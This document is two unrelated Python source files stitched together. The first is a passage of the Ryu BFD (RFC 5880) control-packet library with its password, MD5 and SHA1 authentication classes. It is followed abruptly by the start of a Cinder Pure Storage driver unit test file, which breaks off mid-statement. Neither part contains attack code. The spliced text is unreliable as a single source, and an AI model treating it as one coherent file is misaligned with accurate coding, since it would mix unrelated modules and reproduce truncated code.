0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Type | Auth Len | Auth Key ID | Password... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
2. Format of Keyed MD5 and Meticulous Keyed MD5 Authentication Section
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Type | Auth Len | Auth Key ID | Reserved |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Key/Digest... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
3. Format of Keyed SHA1 and Meticulous Keyed SHA1 Authentication Section
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Type | Auth Len | Auth Key ID | Reserved |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Key/Hash... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
"""
import binascii
import hashlib
import random
import six
import struct
from . import packet_base
from ryu.lib import addrconv
from ryu.lib import stringify
BFD_STATE_ADMIN_DOWN = 0
BFD_STATE_DOWN = 1
BFD_STATE_INIT = 2
BFD_STATE_UP = 3
BFD_STATE_NAME = {0: "AdminDown",
1: "Down",
2: "Init",
3: "Up"}
BFD_FLAG_POLL = 1 << 5
BFD_FLAG_FINAL = 1 << 4
BFD_FLAG_CTRL_PLANE_INDEP = 1 << 3
BFD_FLAG_AUTH_PRESENT = 1 << 2
BFD_FLAG_DEMAND = 1 << 1
BFD_FLAG_MULTIPOINT = 1
BFD_DIAG_NO_DIAG = 0
BFD_DIAG_CTRL_DETECT_TIME_EXPIRED = 1
BFD_DIAG_ECHO_FUNC_FAILED = 2
BFD_DIAG_NEIG_SIG_SESS_DOWN = 3
BFD_DIAG_FWD_PLANE_RESET = 4
BFD_DIAG_PATH_DOWN = 5
BFD_DIAG_CONCAT_PATH_DOWN = 6
BFD_DIAG_ADMIN_DOWN = 7
BFD_DIAG_REV_CONCAT_PATH_DOWN = 8
BFD_DIAG_CODE_NAME = {0: "No Diagnostic",
1: "Control Detection Time Expired",
2: "Echo Function Failed",
3: "Neighbor Signaled Session Down",
4: "Forwarding Plane Reset",
5: "Path Down",
6: "Concatenated Path Down",
7: "Administratively Down",
8: "Reverse Concatenated Path Down"}
BFD_AUTH_RESERVED = 0
BFD_AUTH_SIMPLE_PASS = 1
BFD_AUTH_KEYED_MD5 = 2
BFD_AUTH_METICULOUS_KEYED_MD5 = 3
BFD_AUTH_KEYED_SHA1 = 4
BFD_AUTH_METICULOUS_KEYED_SHA1 = 5
BFD_AUTH_TYPE_NAME = {0: "Reserved",
1: "Simple Password",
2: "Keyed MD5",
3: "Meticulous Keyed MD5",
4: "Keyed SHA1",
5: "Meticulous Keyed SHA1"}
class bfd(packet_base.PacketBase):
"""BFD (RFC 5880) Control packet encoder/decoder class.
The serialized packet looks like the ones described
in the following sections.
* RFC 5880 Generic BFD Control Packet Format
An instance has the following attributes at least.
Most of them are the same as the on-wire counterparts, but in host byte order.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|L|
============================== ============================================
Attribute Description
============================== ============================================
ver The version number of the protocol.
This class implements protocol version 1.
diag A diagnostic code specifying the local
system's reason for the last change in
session state.
state The current BFD session state as seen by
the transmitting system.
flags Bitmap of the following flags.
| BFD_FLAG_POLL
| BFD_FLAG_FINAL
| BFD_FLAG_CTRL_PLANE_INDEP
| BFD_FLAG_AUTH_PRESENT
| BFD_FLAG_DEMAND
| BFD_FLAG_MULTIPOINT
detect_mult Detection time multiplier.
my_discr My Discriminator.
your_discr Your Discriminator.
desired_min_tx_interval Desired Min TX Interval. (in microseconds)
required_min_rx_interval Required Min RX Interval. (in microseconds)
required_min_echo_rx_interval Required Min Echo RX Interval.
(in microseconds)
auth_cls (Optional) Authentication Section instance.
It's defined only when the Authentication
Present (A) bit is set in flags.
Assign an instance of the following classes:
``SimplePassword``, ``KeyedMD5``,
``MeticulousKeyedMD5``, ``KeyedSHA1``, and
``MeticulousKeyedSHA1``.
length (Optional) Length of the BFD Control packet,
in bytes.
============================== ============================================
"""
_PACK_STR = '!BBBBIIIII'
_PACK_STR_LEN = struct.calcsize(_PACK_STR)
_TYPE = {
'ascii': []
}
_auth_parsers = {}
def __init__(self, ver=1, diag=0, state=0, flags=0, detect_mult=0,
my_discr=0, your_discr=0, desired_min_tx_interval=0,
required_min_rx_interval=0, required_min_echo_rx_interval=0,
auth_cls=None, length=None):
super(bfd, self).__init__()
self.ver = ver
self.diag = diag
self.state = state
self.flags = flags
self.detect_mult = detect_mult
self.my_discr = my_discr
self.your_discr = your_discr
self.desired_min_tx_interval = desired_min_tx_interval
self.required_min_rx_interval = required_min_rx_interval
self.required_min_echo_rx_interval = required_min_echo_rx_interval
self.auth_cls = auth_cls
if isinstance(length, int):
self.length = length
else:
self.length = len(self)
def __len__(self):
if self.flags & BFD_FLAG_AUTH_PRESENT and self.auth_cls is not None:
return self._PACK_STR_LEN + len(self.auth_cls)
else:
return self._PACK_STR_LEN
@classmethod
def parser(cls, buf):
(diag, flags, detect_mult, length, my_discr, your_discr,
desired_min_tx_interval, required_min_rx_interval,
required_min_echo_rx_interval) = \
struct.unpack_from(cls._PACK_STR, buf[:cls._PACK_STR_LEN])
ver = diag >> 5
diag = diag & 0x1f
state = flags >> 6
flags = flags & 0x3f
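# Worked example of the bit unpacking above: a first byte of 0x20 yields
# ver=1 and diag=0 (No Diagnostic); a second byte of 0x46 yields state=1
# (Down) and flags == BFD_FLAG_AUTH_PRESENT | BFD_FLAG_DEMAND.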
if flags & BFD_FLAG_AUTH_PRESENT:
auth_type = six.indexbytes(buf, cls._PACK_STR_LEN)
auth_cls = cls._auth_parsers[auth_type].\
parser(buf[cls._PACK_STR_LEN:])[0]
else:
auth_cls = None
msg = cls(ver, diag, state, flags, detect_mult,
my_discr, your_discr, desired_min_tx_interval,
required_min_rx_interval, required_min_echo_rx_interval,
auth_cls)
return msg, None, None
def serialize(self, payload, prev):
if self.flags & BFD_FLAG_AUTH_PRESENT and self.auth_cls is not None:
return self.pack() + \
self.auth_cls.serialize(payload=None, prev=self)
else:
return self.pack()
def pack(self):
"""
Encode a BFD Control packet without authentication section.
"""
diag = (self.ver << 5) + self.diag
flags = (self.state << 6) + self.flags
length = len(self)
return struct.pack(self._PACK_STR, diag, flags, self.detect_mult,
length, self.my_discr, self.your_discr,
self.desired_min_tx_interval,
self.required_min_rx_interval,
self.required_min_echo_rx_interval)
def authenticate(self, *args, **kwargs):
"""Authenticate this packet.
Returns a boolean indicating whether the packet can be authenticated.
Returns ``False`` if the Authentication Present (A) bit is not set in the
flags of this packet.
Returns ``False`` if the Authentication Section for this packet is not
present.
For the description of the arguments of this method, refer to the
authentication method of the Authentication Section classes.
"""
if not self.flags & BFD_FLAG_AUTH_PRESENT or \
not issubclass(self.auth_cls.__class__, BFDAuth):
return False
return self.auth_cls.authenticate(self, *args, **kwargs)
@classmethod
def set_auth_parser(cls, auth_cls):
cls._auth_parsers[auth_cls.auth_type] = auth_cls
@classmethod
def register_auth_type(cls, auth_type):
def _set_type(auth_cls):
auth_cls.set_type(auth_cls, auth_type)
cls.set_auth_parser(auth_cls)
return auth_cls
return _set_type
class BFDAuth(stringify.StringifyMixin):
"""Base class of BFD (RFC 5880) Authentication Section
An instance has the following attributes at least.
Most of them are the same as the on-wire counterparts, but in host byte order.
.. tabularcolumns:: |l|L|
=========== ============================================
Attribute Description
=========== ============================================
auth_type The authentication type in use.
auth_len The length, in bytes, of the authentication
section, including the ``auth_type`` and
``auth_len`` fields.
=========== ============================================
"""
_PACK_HDR_STR = '!BB'
_PACK_HDR_STR_LEN = struct.calcsize(_PACK_HDR_STR)
auth_type = None
def __init__(self, auth_len=None):
super(BFDAuth, self).__init__()
if isinstance(auth_len, int):
self.auth_len = auth_len
else:
self.auth_len = len(self)
@staticmethod
def set_type(subcls, auth_type):
assert issubclass(subcls, BFDAuth)
subcls.auth_type = auth_type
@classmethod
def parser_hdr(cls, buf):
"""
Parser for common part of authentication section.
"""
return struct.unpack_from(cls._PACK_HDR_STR,
buf[:cls._PACK_HDR_STR_LEN])
def serialize_hdr(self):
"""
Serialization function for common part of authentication section.
"""
return struct.pack(self._PACK_HDR_STR, self.auth_type, self.auth_len)
@bfd.register_auth_type(BFD_AUTH_SIMPLE_PASS)
class SimplePassword(BFDAuth):
""" BFD (RFC 5880) Simple Password Authentication Section class
An instance has the following attributes.
Most of them are the same as the on-wire counterparts, but in host byte order.
.. tabularcolumns:: |l|L|
=========== ============================================
Attribute Description
=========== ============================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
password The simple password in use on this session.
The password is a binary string, and MUST be
from 1 to 16 bytes in length.
auth_len The length, in bytes, of the authentication
section, including the ``auth_type`` and
``auth_len`` fields.
=========== ============================================
"""
_PACK_STR = '!B'
_PACK_STR_LEN = struct.calcsize(_PACK_STR)
def __init__(self, auth_key_id, password, auth_len=None):
assert 1 <= len(password) <= 16
self.auth_key_id = auth_key_id
self.password = password
super(SimplePassword, self).__init__(auth_len)
def __len__(self):
return self._PACK_HDR_STR_LEN + self._PACK_STR_LEN + len(self.password)
@classmethod
def parser(cls, buf):
(auth_type, auth_len) = cls.parser_hdr(buf)
assert auth_type == cls.auth_type
auth_key_id = six.indexbytes(buf, cls._PACK_HDR_STR_LEN)
password = buf[cls._PACK_HDR_STR_LEN + cls._PACK_STR_LEN:auth_len]
msg = cls(auth_key_id, password, auth_len)
return msg, None, None
def serialize(self, payload, prev):
"""Encode a Simple Password Authentication Section.
``payload`` is the rest of the packet which will immediately follow
this section.
``prev`` is a ``bfd`` instance for the BFD Control header. It is not
needed when encoding only the Simple Password section.
"""
return self.serialize_hdr() + \
struct.pack(self._PACK_STR, self.auth_key_id) + self.password
def authenticate(self, prev=None, auth_keys=None):
"""Authenticate the password for this packet.
This method can be invoked only when ``self.password`` is defined.
Returns a boolean indicating whether the password can be authenticated.
``prev`` is a ``bfd`` instance for the BFD Control header. It is not
needed for authenticating the Simple Password.
``auth_keys`` is a dictionary of the authentication key chain, in which
each key is an integer *Auth Key ID* and each value is a *Password* string.
"""
auth_keys = auth_keys if auth_keys else {}
assert isinstance(prev, bfd)
return (self.auth_key_id in auth_keys and
self.password == auth_keys[self.auth_key_id])
@bfd.register_auth_type(BFD_AUTH_KEYED_MD5)
class KeyedMD5(BFDAuth):
""" BFD (RFC 5880) Keyed MD5 Authentication Section class
An instance has the following attributes.
Most of them are the same as the on-wire counterparts, but in host byte order.
.. tabularcolumns:: |l|L|
=========== =================================================
Attribute Description
=========== =================================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
seq The sequence number for this packet.
This value is incremented occasionally.
auth_key The shared MD5 key for this packet.
digest (Optional) The 16-byte MD5 digest for the packet.
auth_len (Fixed) The length of the authentication section
is 24 bytes.
=========== =================================================
"""
_PACK_STR = '!BBL16s'
_PACK_STR_LEN = struct.calcsize(_PACK_STR)
def __init__(self, auth_key_id, seq, auth_key=None, digest=None,
auth_len=None):
self.auth_key_id = auth_key_id
self.seq = seq
self.auth_key = auth_key
self.digest = digest
super(KeyedMD5, self).__init__(auth_len)
def __len__(self):
# Defined in RFC5880 Section 4.3.
return 24
@classmethod
def parser(cls, buf):
(auth_type, auth_len) = cls.parser_hdr(buf)
assert auth_type == cls.auth_type
assert auth_len == 24
(auth_key_id, reserved, seq, digest) = \
struct.unpack_from(cls._PACK_STR, buf[cls._PACK_HDR_STR_LEN:])
assert reserved == 0
msg = cls(auth_key_id=auth_key_id, seq=seq, auth_key=None,
digest=digest)
return msg, None, None
def serialize(self, payload, prev):
"""Encode a Keyed MD5 Authentication Section.
This method is used only when encoding a BFD Control packet.
``payload`` is the rest of the packet which will immediately follow
this section.
``prev`` is a ``bfd`` instance for the BFD Control header which this
authentication section belongs to. It must be assigned
because an MD5 digest must be calculated over the entire BFD Control
packet.
"""
assert self.auth_key is not None and len(self.auth_key) <= 16
assert isinstance(prev, bfd)
bfd_bin = prev.pack()
auth_hdr_bin = self.serialize_hdr()
# Pad the shared key out to 16 bytes before hashing.
auth_data_bin = struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, self.auth_key +
(b'\x00' * (16 - len(self.auth_key))))
h = hashlib.md5()
h.update(bfd_bin + auth_hdr_bin + auth_data_bin)
self.digest = h.digest()
return auth_hdr_bin + struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, self.digest)
def authenticate(self, prev, auth_keys=None):
"""Authenticate the MD5 digest for this packet.
This method can be invoked only when ``self.digest`` is defined.
Returns a boolean indicating whether the digest can be authenticated
by the corresponding Auth Key.
``prev`` is a ``bfd`` instance for the BFD Control header which this
authentication section belongs to. It must be assigned because an MD5
digest must be calculated over the entire BFD Control packet.
``auth_keys`` is a dictionary of the authentication key chain, in which
each key is an integer *Auth Key ID* and each value is an *Auth Key* string.
"""
auth_keys = auth_keys if auth_keys else {}
assert isinstance(prev, bfd)
if self.digest is None:
return False
if self.auth_key_id not in auth_keys:
return False
auth_key = auth_keys[self.auth_key_id]
bfd_bin = prev.pack()
auth_hdr_bin = self.serialize_hdr()
# Pad the shared key out to 16 bytes before hashing.
auth_data_bin = struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, auth_key +
(b'\x00' * (16 - len(auth_key))))
h = hashlib.md5()
h.update(bfd_bin + auth_hdr_bin + auth_data_bin)
return self.digest == h.digest()
@bfd.register_auth_type(BFD_AUTH_METICULOUS_KEYED_MD5)
class MeticulousKeyedMD5(KeyedMD5):
""" BFD (RFC 5880) Meticulous Keyed MD5 Authentication Section class
All methods of this class are inherited from ``KeyedMD5``.
An instance has the following attributes.
Most of them are the same as the on-wire counterparts, but in host byte order.
.. tabularcolumns:: |l|L|
=========== =================================================
Attribute Description
=========== =================================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
seq The sequence number for this packet.
This value is incremented for each
successive packet transmitted for a session.
auth_key The shared MD5 key for this packet.
digest (Optional) The 16-byte MD5 digest for the packet.
auth_len (Fixed) The length of the authentication section
is 24 bytes.
=========== =================================================
"""
pass
@bfd.register_auth_type(BFD_AUTH_KEYED_SHA1)
class KeyedSHA1(BFDAuth):
""" BFD (RFC 5880) Keyed SHA1 Authentication Section class
An instance has the following attributes.
Most of them are the same as the on-wire counterparts, but in host byte order.
.. tabularcolumns:: |l|L|
=========== ================================================
Attribute Description
=========== ================================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
seq The sequence number for this packet.
This value is incremented occasionally.
auth_key The shared SHA1 key for this packet.
auth_hash (Optional) The 20-byte SHA1 hash for the packet.
auth_len (Fixed) The length of the authentication section
is 28 bytes.
=========== ================================================
"""
_PACK_STR = '!BBL20s'
_PACK_STR_LEN = struct.calcsize(_PACK_STR)
def __init__(self, auth_key_id, seq, auth_key=None, auth_hash=None,
auth_len=None):
self.auth_key_id = auth_key_id
self.seq = seq
self.auth_key = auth_key
self.auth_hash = auth_hash
super(KeyedSHA1, self).__init__(auth_len)
def __len__(self):
# Defined in RFC5880 Section 4.4.
return 28
@classmethod
def parser(cls, buf):
(auth_type, auth_len) = cls.parser_hdr(buf)
assert auth_type == cls.auth_type
assert auth_len == 28
(auth_key_id, reserved, seq, auth_hash) = \
struct.unpack_from(cls._PACK_STR, buf[cls._PACK_HDR_STR_LEN:])
assert reserved == 0
msg = cls(auth_key_id=auth_key_id, seq=seq, auth_key=None,
auth_hash=auth_hash)
return msg, None, None
def serialize(self, payload, prev):
"""Encode a Keyed SHA1 Authentication Section.
This method is used only when encoding a BFD Control packet.
``payload`` is the rest of the packet which will immediately follow
this section.
``prev`` is a ``bfd`` instance for the BFD Control header which this
authentication section belongs to. It must be assigned
because an SHA1 hash must be calculated over the entire BFD Control
packet.
"""
assert self.auth_key is not None and len(self.auth_key) <= 20
assert isinstance(prev, bfd)
bfd_bin = prev.pack()
auth_hdr_bin = self.serialize_hdr()
# Pad the shared key out to 20 bytes before hashing.
auth_data_bin = struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, self.auth_key +
(b'\x00' * (20 - len(self.auth_key))))
h = hashlib.sha1()
h.update(bfd_bin + auth_hdr_bin + auth_data_bin)
self.auth_hash = h.digest()
return auth_hdr_bin + struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, self.auth_hash)
def authenticate(self, prev, auth_keys=None):
"""Authenticate the SHA1 hash for this packet.
This method can be invoked only when ``self.auth_hash`` is defined.
Returns a boolean indicating whether the hash can be authenticated
by the corresponding Auth Key.
``prev`` is a ``bfd`` instance for the BFD Control header which this
authentication section belongs to. It must be assigned because an SHA1
hash must be calculated over the entire BFD Control packet.
``auth_keys`` is a dictionary of the authentication key chain, in which
each key is an integer *Auth Key ID* and each value is an *Auth Key* string.
"""
auth_keys = auth_keys if auth_keys else {}
assert isinstance(prev, bfd)
if self.auth_hash is None:
return False
if self.auth_key_id not in auth_keys:
return False
auth_key = auth_keys[self.auth_key_id]
bfd_bin = prev.pack()
auth_hdr_bin = self.serialize_hdr()
# Pad the shared key out to 20 bytes before hashing.
auth_data_bin = struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, auth_key +
(b'\x00' * (20 - len(auth_key))))
h = hashlib.sha1()
h.update(bfd_bin + auth_hdr_bin + auth_data_bin)
return self.auth_hash == h.digest()
@bfd.register_auth_type(BFD_AUTH_METICULOUS_KEYED_SHA1)
class MeticulousKeyedSHA1(KeyedSHA1):
""" BFD (RFC 5880) Meticulous Keyed SHA1 Authentication Section class
All methods of this class are inherited from ``KeyedSHA1``.
An instance has the following attributes.
Most of them are the same as the on-wire counterparts, but in host byte order.
.. tabularcolumns:: |l|L|
=========== ================================================
Attribute Description
=========== ================================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
seq The sequence number for this packet.
This value is incremented for each
successive packet transmitted for a session.
auth_key The shared SHA1 key for this packet.
auth_hash (Optional) The 20-byte SHA1 hash for the packet.
auth_len (Fixed) The length of the authentication section
is 28 bytes.
=========== ================================================
"""
pass
bfd.set_classes(bfd._auth_parsers)
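# A minimal round-trip sketch (illustrative field values; semantics are
# defined in RFC 5880):
#
#   pkt = bfd(ver=1, diag=BFD_DIAG_NO_DIAG, state=BFD_STATE_DOWN,
#             flags=BFD_FLAG_AUTH_PRESENT, detect_mult=3,
#             my_discr=0x11111111, your_discr=0,
#             desired_min_tx_interval=1000000,
#             required_min_rx_interval=1000000,
#             auth_cls=SimplePassword(auth_key_id=1, password=b'secret'))
#   wire = pkt.serialize(payload=None, prev=None)
#   parsed, _, _ = bfd.parser(wire)
#   assert parsed.authenticate(auth_keys={1: b'secret'})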
|
|
# Copyright (c) 2014 Pure Storage, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from copy import deepcopy
import sys
import mock
from oslo_utils import units
from cinder import exception
from cinder import test
def fake_retry(exceptions, interval=1, retries=3, backoff_rate=2):
def _decorator(f):
return f
return _decorator
patch_retry = mock.patch('cinder.utils.retry', fake_retry)
patch_retry.start()
sys.modules['purestorage'] = mock.Mock()
from cinder.volume.drivers import pure
# Only mock utils.retry for cinder.volume.drivers.pure import
patch_retry.stop()
DRIVER_PATH = "cinder.volume.drivers.pure"
BASE_DRIVER_OBJ = DRIVER_PATH + ".PureBaseVolumeDriver"
ISCSI_DRIVER_OBJ = DRIVER_PATH + ".PureISCSIDriver"
FC_DRIVER_OBJ = DRIVER_PATH + ".PureFCDriver"
ARRAY_OBJ = DRIVER_PATH + ".FlashArray"
TARGET = "pure-target"
API_TOKEN = "12345678-abcd-1234-abcd-1234567890ab"
VOLUME_BACKEND_NAME = "Pure_iSCSI"
ISCSI_PORT_NAMES = ["ct0.eth2", "ct0.eth3", "ct1.eth2", "ct1.eth3"]
FC_PORT_NAMES = ["ct0.fc2", "ct0.fc3", "ct1.fc2", "ct1.fc3"]
ISCSI_IPS = ["10.0.0." + str(i + 1) for i in range(len(ISCSI_PORT_NAMES))]
FC_WWNS = ["21000024ff59fe9" + str(i + 1) for i in range(len(FC_PORT_NAMES))]
HOSTNAME = "computenode1"
PURE_HOST_NAME = pure.PureBaseVolumeDriver._generate_purity_host_name(HOSTNAME)
PURE_HOST = {
"name": PURE_HOST_NAME,
"hgroup": None,
"iqn": [],
"wwn": [],
}
REST_VERSION = "1.2"
VOLUME_ID = "abcdabcd-1234-abcd-1234-abcdeffedcba"
VOLUME = {
"name": "volume-" + VOLUME_ID,
"id": VOLUME_ID,
"display_name": "fake_volume",
"size": 2,
"host": "irrelevant",
"volume_type": None,
"volume_type_id": None,
"consistencygroup_id": None,
}
VOLUME_WITH_CGROUP = VOLUME.copy()
VOLUME_WITH_CGROUP['consistencygroup_id'] = \
"4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
SRC_VOL_ID = "dc7a294d-5964-4379-a15f-ce5554734efc"
SRC_VOL = {
"name": "volume-" + SRC_VOL_ID,
"id": SRC_VOL_ID,
"display_name": 'fake_src',
"size": 2,
"host": "irrelevant",
"volume_type": None,
"volume_type_id": None,
"consistencygroup_id": None,
}
SNAPSHOT_ID = "04fe2f9a-d0c4-4564-a30d-693cc3657b47"
SNAPSHOT = {
"name": "snapshot-" + SNAPSHOT_ID,
"id": SNAPSHOT_ID,
"volume_id": SRC_VOL_ID,
"volume_name": "volume-" + SRC_VOL_ID,
"volume_size": 2,
"display_name": "fake_snapshot",
"cgsnapshot_id": None,
}
SNAPSHOT_WITH_CGROUP = SNAPSHOT.copy()
SNAPSHOT_WITH_CGROUP['cgsnapshot_id'] = \
"4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
INITIATOR_IQN = "iqn.1993-08.org.debian:01:222"
INITIATOR_WWN = "5001500150015081"
ISCSI_CONNECTOR = {"initiator": INITIATOR_IQN, "host": HOSTNAME}
FC_CONNECTOR = {"wwpns": {INITIATOR_WWN}, "host": HOSTNAME}
TARGET_IQN = "iqn.2010-06.com.purestorage:flasharray.12345abc"
TARGET_WWN = "21000024ff59fe94"
TARGET_PORT = "3260"
INITIATOR_TARGET_MAP =\
{
'5001500150015081': ['21000024ff59fe93',
'21000024ff59fe92',
'21000024ff59fe91',
'21000024ff59fe94'],
}
DEVICE_MAPPING =\
{
"fabric": {'initiator_port_wwn_list': {INITIATOR_WWN},
'target_port_wwn_list': FC_WWNS
},
}
ISCSI_PORTS = [{"name": name,
"iqn": TARGET_IQN,
"portal": ip + ":" + TARGET_PORT,
"wwn": None,
} for name, ip in zip(ISCSI_PORT_NAMES, ISCSI_IPS)]
FC_PORTS = [{"name": name,
"iqn": None,
"portal": None,
"wwn": wwn,
} for name, wwn in zip(FC_PORT_NAMES, FC_WWNS)]
NON_ISCSI_PORT = {
"name": "ct0.fc1",
"iqn": None,
"portal": None,
"wwn": "5001500150015081",
}
PORTS_WITH = ISCSI_PORTS + [NON_ISCSI_PORT]
PORTS_WITHOUT = [NON_ISCSI_PORT]
VOLUME_CONNECTIONS = [
{"host": "h1", "name": VOLUME["name"] + "-cinder"},
{"host": "h2", "name": VOLUME["name"] + "-cinder"},
]
TOTAL_CAPACITY = 50.0
USED_SPACE = 32.1
PROVISIONED_CAPACITY = 70.0
DEFAULT_OVER_SUBSCRIPTION = 20
SPACE_INFO = {
"capacity": TOTAL_CAPACITY * units.Gi,
"total": USED_SPACE * units.Gi,
}
SPACE_INFO_EMPTY = {
"capacity": TOTAL_CAPACITY * units.Gi,
"total": 0,
}
ISCSI_CONNECTION_INFO = {
"driver_volume_type": "iscsi",
"data": {
"target_discovered": False,
"access_mode": "rw",
"discard": True,
"target_luns": [1, 1, 1, 1],
"target_iqns": [TARGET_IQN, TARGET_IQN, TARGET_IQN, TARGET_IQN],
"target_portals": [ISCSI_IPS[0] + ":" + TARGET_PORT,
ISCSI_IPS[1] + ":" + TARGET_PORT,
ISCSI_IPS[2] + ":" + TARGET_PORT,
ISCSI_IPS[3] + ":" + TARGET_PORT],
},
}
FC_CONNECTION_INFO = {
"driver_volume_type": "fibre_channel",
"data": {
"target_wwn": FC_WWNS,
"target_lun": 1,
"target_discovered": True,
"access_mode": "rw",
"initiator_target_map": INITIATOR_TARGET_MAP,
"discard": True,
},
}
class FakePureStorageHTTPError(Exception):
def __init__(self, target=None, rest_version=None, code=None,
headers=None, text=None):
self.target = target
self.rest_version = rest_version
self.code = code
self.headers = headers
self.text = text
class PureDriverTestCase(test.TestCase):
def setUp(self):
super(PureDriverTestCase, self).setUp()
self.mock_config = mock.Mock()
self.mock_config.san_ip = TARGET
self.mock_config.pure_api_token = API_TOKEN
self.mock_config.volume_backend_name = VOLUME_BACKEND_NAME
self.array = mock.Mock()
self.purestorage_module = pure.purestorage
self.purestorage_module.PureHTTPError = FakePureStorageHTTPError
def assert_error_propagates(self, mocks, func, *args, **kwargs):
"""Assert that errors from mocks propagate to func.
Fail if exceptions raised by mocks are not seen when calling
func(*args, **kwargs). Ensure that we are really seeing exceptions
from the mocks by failing if just running func(*args, **kargs) raises
an exception itself.
"""
func(*args, **kwargs)
for mock_func in mocks:
original_side_effect = mock_func.side_effect
mock_func.side_effect = [exception.PureDriverException(
reason='reason')]
self.assertRaises(exception.PureDriverException,
func, *args, **kwargs)
mock_func.side_effect = original_side_effect
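# The helper above is the backbone of the tests that follow: each test first
# exercises the happy path, then re-runs the driver call with each relevant
# mocked Purity API method raising PureDriverException in turn, asserting
# that the failure propagates rather than being silently swallowed.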
class PureBaseVolumeDriverTestCase(PureDriverTestCase):
class fake_pure_base_volume_driver(pure.PureBaseVolumeDriver):
def initialize_connection(self, volume, connector):
pass
def setUp(self):
super(PureBaseVolumeDriverTestCase, self).setUp()
self.driver = self.fake_pure_base_volume_driver(
configuration=self.mock_config)
self.driver._array = self.array
def test_generate_purity_host_name(self):
result = self.driver._generate_purity_host_name(
"really-long-string-thats-a-bit-too-long")
self.assertTrue(result.startswith("really-long-string-that-"))
self.assertTrue(result.endswith("-cinder"))
self.assertEqual(63, len(result))
self.assertTrue(pure.GENERATED_NAME.match(result))
result = self.driver._generate_purity_host_name("!@#$%^-invalid&*")
self.assertTrue(result.startswith("invalid---"))
self.assertTrue(result.endswith("-cinder"))
self.assertEqual(49, len(result))
self.assertTrue(pure.GENERATED_NAME.match(result))
def test_create_volume(self):
self.driver.create_volume(VOLUME)
self.array.create_volume.assert_called_with(
VOLUME["name"] + "-cinder", 2 * units.Gi)
self.assert_error_propagates([self.array.create_volume],
self.driver.create_volume, VOLUME)
@mock.patch(BASE_DRIVER_OBJ + "._add_volume_to_consistency_group",
autospec=True)
def test_create_volume_with_cgroup(self, mock_add_to_cgroup):
vol_name = VOLUME_WITH_CGROUP["name"] + "-cinder"
self.driver.create_volume(VOLUME_WITH_CGROUP)
mock_add_to_cgroup\
.assert_called_with(self.driver,
VOLUME_WITH_CGROUP['consistencygroup_id'],
vol_name)
def test_create_volume_from_snapshot(self):
vol_name = VOLUME["name"] + "-cinder"
snap_name = SNAPSHOT["volume_name"] + "-cinder." + SNAPSHOT["name"]
# Branch where extend unneeded
self.driver.create_volume_from_snapshot(VOLUME, SNAPSHOT)
self.array.copy_volume.assert_called_with(snap_name, vol_name)
self.assertFalse(self.array.extend_volume.called)
self.assert_error_propagates(
[self.array.copy_volume],
self.driver.create_volume_from_snapshot, VOLUME, SNAPSHOT)
self.assertFalse(self.array.extend_volume.called)
# Branch where extend needed
SNAPSHOT["volume_size"] = 1 # resize so smaller than VOLUME
self.driver.create_volume_from_snapshot(VOLUME, SNAPSHOT)
expected = [mock.call.copy_volume(snap_name, vol_name),
mock.call.extend_volume(vol_name, 2 * units.Gi)]
self.array.assert_has_calls(expected)
self.assert_error_propagates(
[self.array.copy_volume, self.array.extend_volume],
